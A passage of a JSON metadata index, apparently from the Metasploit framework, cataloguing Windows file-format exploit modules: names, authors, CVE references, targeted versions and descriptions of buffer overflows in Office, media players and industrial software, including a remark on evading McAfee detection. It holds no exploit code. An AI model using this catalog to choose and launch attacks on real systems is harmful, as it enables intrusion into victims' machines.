"autofilter_services": [
],
"targets": [
"Irfanview 4.32 / Plugins 4.32 / Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/irfanview_jpeg2000_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ispvm_xcf_ispxcf": {
"name": "Lattice Semiconductor ispVM System XCF File Handling Overflow",
"full_name": "exploit/windows/fileformat/ispvm_xcf_ispxcf",
"rank": 300,
"disclosure_date": "2012-05-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way\n ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially\n crafted file, when a long value is supplied for the version attribute of the ispXCF\n tag. It results in arbitrary code execution under the context of the user.",
"references": [
"OSVDB-82000",
"BID-53562",
"URL-http://secunia.com/advisories/48740/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ispvm_xcf_ispxcf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/kingview_kingmess_kvl": {
"name": "KingView Log File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/kingview_kingmess_kvl",
"rank": 300,
"disclosure_date": "2012-11-20",
"type": "exploit",
"author": [
"Lucas Apa",
"Carlos Mario Penagos Hollman",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in KingView <= 6.55. It exists in\n the KingMess.exe application when handling log files, due to the insecure usage of\n sprintf. This module uses a malformed .kvl file which must be opened by the victim\n via the KingMess.exe application, through the 'Browse Log Files' option. The module\n has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over\n Windows XP SP3.",
"references": [
"CVE-2012-4711",
"OSVDB-89690",
"BID-57909",
"URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/kingview_kingmess_kvl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/lattice_pac_bof": {
"name": "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
"full_name": "exploit/windows/fileformat/lattice_pac_bof",
"rank": 300,
"disclosure_date": "2012-05-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer\n 6.21. As a .pac file, when supplying a long string of data to the 'value' field\n under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption\n on the stack, which results in arbitrary code execution under the context of the\n user.",
"references": [
"CVE-2012-2915",
"OSVDB-82001",
"EDB-19006",
"BID-53566",
"URL-http://secunia.com/advisories/48741"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PAC-Designer 6.21 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/lattice_pac_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/lattice_pac_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/lotusnotes_lzh": {
"name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)",
"full_name": "exploit/windows/fileformat/lotusnotes_lzh",
"rank": 400,
"disclosure_date": "2011-05-24",
"type": "exploit",
"author": [
"binaryhouse.net",
"alino <26alino@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net",
"references": [
"CVE-2011-1213",
"OSVDB-72706",
"BID-48018",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904",
"URL-http://www.ibm.com/support/docview.wss?uid=swg21500034"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal",
"Lotus Notes 8.5.2 FP2 / Windows Universal / DEP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/lotusnotes_lzh.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/lotusnotes_lzh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/magix_musikmaker_16_mmm": {
"name": "Magix Musik Maker 16 .mmm Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/magix_musikmaker_16_mmm",
"rank": 400,
"disclosure_date": "2011-04-26",
"type": "exploit",
"author": [
"acidgen",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Magix Musik Maker 16.\n When opening a specially crafted arrangement file (.mmm) in the application, an\n unsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and\n might require up to several seconds to receive a shell.",
"references": [
"OSVDB-72063",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal DEP & ASLR Bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/magix_musikmaker_16_mmm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mcafee_hercules_deletesnapshot": {
"name": "McAfee Remediation Client ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/mcafee_hercules_deletesnapshot",
"rank": 100,
"disclosure_date": "2008-08-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When\n sending an overly long string to the DeleteSnapshot() method\n of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n This control is not marked safe for scripting, so choose your attack vector accordingly.",
"references": [
"OSVDB-94540",
"EDB-16639"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mcafee_showreport_exec": {
"name": "McAfee SaaS MyCioScan ShowReport Remote Command Execution",
"full_name": "exploit/windows/fileformat/mcafee_showreport_exec",
"rank": 300,
"disclosure_date": "2012-01-12",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in McAfee Security-as-a-Service.\n The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails\n to check the FileName argument, and passes it on to a ShellExecuteW() function,\n therefore allows any malicious attacker to execute any process that's on the\n local system. However, if the victim machine is connected to a remote share\n (or something similar), then it's also possible to execute arbitrary code.\n Please note that a custom template is required for the payload, because the\n default Metasploit template is detectable by McAfee -- any Windows binary, such\n as calc.exe or notepad.exe, should bypass McAfee fine.",
"references": [
"OSVDB-78310",
"BID-51397",
"ZDI-12-012"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Internet Explorer"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mcafee_showreport_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mediacoder_m3u": {
"name": "MediaCoder .M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/mediacoder_m3u",
"rank": 300,
"disclosure_date": "2013-06-24",
"type": "exploit",
"author": [
"metacom",
"modpr0be <modpr0be@spentera.com>",
"otoy <otoy@spentera.com>"
],
"description": "This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution under the context\n of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder\n runs with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539\n to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.",
"references": [
"CVE-2017-8869",
"OSVDB-94522",
"EDB-26403"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/fileformat/mediacoder_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mediacoder_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mediajukebox": {
"name": "Media Jukebox 8.0.400 Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/mediajukebox",
"rank": 300,
"disclosure_date": "2009-07-01",
"type": "exploit",
"author": [
"Ron Henry <rlh@ciphermonk.net>",
"dijital1"
],
"description": "This module exploits a stack buffer overflow in Media Jukebox 8.0.400\n by creating a specially crafted m3u or pls file.",
"references": [
"OSVDB-55924",
"CVE-2009-2650"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 - English",
"Windows XP SP2 - English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mediajukebox.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mediajukebox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/microp_mppl": {
"name": "MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/microp_mppl",
"rank": 500,
"disclosure_date": "2010-08-23",
"type": "exploit",
"author": [
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n buffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n which overwrites the lpFileName parameter of a CreateFileA() function, and results\n arbitrary code execution under the context of the user.",
"references": [
"CVE-2010-5299",
"OSVDB-73627",
"EDB-14720"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Vista / 7"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/microp_mppl.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/microp_mppl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/microsoft_windows_contact": {
"name": "Microsoft Windows Contact File Format Arbitary Code Execution",
"full_name": "exploit/windows/fileformat/microsoft_windows_contact",
"rank": 300,
"disclosure_date": "2019-01-17",
"type": "exploit",
"author": [
"John Page (aka hyp3rlinx)",
"Brenner Little"
],
"description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files <c:Url> node param which takes an expected website value, however if an attacker references an\n executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.\n Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n Making matters worse is if the the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.",
"references": [
"EDB-46188",
"URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt",
"ZDI-19-013"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2019-04-10 17:17:50 +0000",
"path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/microsoft_windows_contact",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/millenium_mp3_pls": {
"name": "Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/millenium_mp3_pls",
"rank": 500,
"disclosure_date": "2009-07-30",
"type": "exploit",
"author": [
"Molotov",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.\n This functionality has not been tested in this module.",
"references": [
"OSVDB-56574",
"EDB-9618",
"EDB-10240"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/millenium_mp3_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mini_stream_pls_bof": {
"name": "Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/mini_stream_pls_bof",
"rank": 500,
"disclosure_date": "2010-07-16",
"type": "exploit",
"author": [
"Madjix",
"Tiago Henriques",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3\n Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim\n opens the malicious PLS file.",
"references": [
"CVE-2010-5081",
"OSVDB-78078",
"EDB-14373",
"BID-34514"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30"
],
"mod_time": "2018-07-09 13:22:08 +0000",
"path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mini_stream_pls_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mjm_coreplayer2011_s3m": {
"name": "MJM Core Player 2011 .s3m Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/mjm_coreplayer2011_s3m",
"rank": 400,
"disclosure_date": "2011-04-30",
"type": "exploit",
"author": [
"rick2600",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in MJM Core Player 2011\n When opening a malicious s3m file in this application, a stack buffer overflow can be\n triggered, resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
"references": [
"OSVDB-72101",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal Generic DEP & ASLR Bypass"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mjm_coreplayer2011_s3m",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mjm_quickplayer_s3m": {
"name": "MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/mjm_quickplayer_s3m",
"rank": 400,
"disclosure_date": "2011-04-30",
"type": "exploit",
"author": [
"rick2600",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n one of these 2 applications, a stack buffer overflow can be triggered, resulting in\n arbitrary code execution.\n\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
"references": [
"OSVDB-72102",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal Generic DEP & ASLR Bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mjm_quickplayer_s3m",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/moxa_mediadbplayback": {
"name": "MOXA MediaDBPlayback ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/moxa_mediadbplayback",
"rank": 200,
"disclosure_date": "2010-10-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When\n sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-4742",
"OSVDB-68986",
"URL-http://www.moxa.com"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/moxa_mediadbplayback",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mplayer_m3u_bof": {
"name": "MPlayer Lite M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/mplayer_m3u_bof",
"rank": 200,
"disclosure_date": "2011-03-19",
"type": "exploit",
"author": [
"C4SS!0 and h1ch4m",
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.",
"references": [
"BID-46926",
"EDB-17013",
"URL-http://www.mplayer-ww.com/eng/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mplayer_m3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mplayer_sami_bof": {
"name": "MPlayer SAMI Subtitle File Buffer Overflow",
"full_name": "exploit/windows/fileformat/mplayer_sami_bof",
"rank": 300,
"disclosure_date": "2011-05-19",
"type": "exploit",
"author": [
"Jacques Louw",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow found in the handling\n of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently\n targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.\n\n The overflow is triggered when an unsuspecting victim opens a movie file first,\n followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also\n be done from the console with the MPlayer \"-sub\" option.",
"references": [
"BID-49149",
"OSVDB-74604",
"URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mplayer_sami_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms09_067_excel_featheader": {
"name": "MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability",
"full_name": "exploit/windows/fileformat/ms09_067_excel_featheader",
"rank": 400,
"disclosure_date": "2009-11-10",
"type": "exploit",
"author": [
"Sean Larsson",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the handling of the FEATHEADER record\n by Microsoft Excel. Revisions of Office XP and later prior to the release of the\n MS09-067 bulletin are vulnerable.\n\n When processing a FEATHEADER (Shared Feature) record, Microsoft used a data\n structure from the file to calculate a pointer offset without doing proper\n validation. Attacker supplied data is then used to calculate the location of an\n object, and in turn a virtual function call. This results in arbitrary code\n execution.\n\n NOTE: On some versions of Office, the user will need to dismiss a warning dialog\n prior to the payload executing.",
"references": [
"CVE-2009-3129",
"OSVDB-59860",
"MSB-MS09-067",
"BID-36945",
"ZDI-09-083",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English",
"Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English",
"Microsoft Office 2003 SP0 English on Windows XP SP3 English",
"Microsoft Office 2007 SP2 English on Windows XP SP3 English",
"Crash Target for Debugging"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms09_067_excel_featheader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms10_004_textbytesatom": {
"name": "MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms10_004_textbytesatom",
"rank": 400,
"disclosure_date": "2010-02-09",
"type": "exploit",
"author": [
"SkD",
"Snake",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow vulnerability in the handling of\n the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n Office 2004 for Mac, are vulnerable.\n\n NOTE: The vulnerable code path is not reachable on versions of Windows prior to\n Windows Vista.",
"references": [
"CVE-2010-0033",
"OSVDB-62241",
"MSB-MS10-004",
"ZDI-10-017"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft PowerPoint Viewer 2003",
"Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3",
"Microsoft PowerPoint Viewer 2003 (kb969615)",
"Crash Target for Debugging"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms10_004_textbytesatom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms10_038_excel_obj_bof": {
"name": "MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow",
"full_name": "exploit/windows/fileformat/ms10_038_excel_obj_bof",
"rank": 300,
"disclosure_date": "2010-06-08",
"type": "exploit",
"author": [
"Nicolas Joly",
"Shahin Ramezany <shahin@abysssec.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.\n By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker\n can get the control of the execution flow. This results in arbitrary code execution under\n the context of the user.",
"references": [
"CVE-2010-0822",
"OSVDB-65236",
"BID-40520",
"MSB-MS10-038",
"URL-https://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3",
"Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms10_038_excel_obj_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms10_087_rtf_pfragments_bof": {
"name": "MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",
"full_name": "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof",
"rank": 500,
"disclosure_date": "2010-11-09",
"type": "exploit",
"author": [
"wushi of team509",
"unknown",
"jduck <jduck@metasploit.com>",
"DJ Manila Ice, Vesh, CA"
],
"description": "This module exploits a stack-based buffer overflow in the handling of the\n 'pFragments' shape property within the Microsoft Word RTF parser. All versions\n of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n MS10-087 bulletin are vulnerable.\n\n This module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n The Microsoft Word RTF parser was only used by default in versions of Microsoft\n Word itself prior to Office 2007. With the release of Office 2007, Microsoft\n began using the Word RTF parser, by default, to handle rich-text messages within\n Outlook as well. It was possible to configure Outlook 2003 and earlier to use\n the Microsoft Word engine too, but it was not a default setting.\n\n It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n Microsoft will confirm or deny this since Office 2000 has reached its support\n cycle end-of-life.",
"references": [
"CVE-2010-3333",
"OSVDB-69085",
"MSB-MS10-087",
"BID-44652",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Microsoft Office 2002 SP3 English on Windows XP SP3 English",
"Microsoft Office 2003 SP3 English on Windows XP SP3 English",
"Microsoft Office 2007 SP0 English on Windows XP SP3 English",
"Microsoft Office 2007 SP0 English on Windows Vista SP0 English",
"Microsoft Office 2007 SP0 English on Windows 7 SP0 English",
"Crash Target for Debugging"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms10_087_rtf_pfragments_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms11_006_createsizeddibsection": {
"name": "MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms11_006_createsizeddibsection",
"rank": 500,
"disclosure_date": "2010-12-15",
"type": "exploit",
"author": [
"Moti & Xu Hao",
"Yaniv Miron aka Lament of ilhack",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the handling of thumbnails\n within .MIC files and various Office documents. When processing a thumbnail bitmap\n containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n leads to arbitrary code execution.\n\n In order to trigger the vulnerable code, the folder containing the document must be\n viewed using the \"Thumbnails\" view.",
"references": [
"CVE-2010-3970",
"OSVDB-70263",
"MSB-MS11-006",
"BID-45662",
"URL-http://www.microsoft.com/technet/security/advisory/2490606.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 SP0/SP4 English",
"Windows XP SP3 English",
"Crash Target for Debugging"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms11_006_createsizeddibsection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms11_021_xlb_bof": {
"name": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms11_021_xlb_bof",
"rank": 300,
"disclosure_date": "2011-08-09",
"type": "exploit",
"author": [
"Aniway",
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
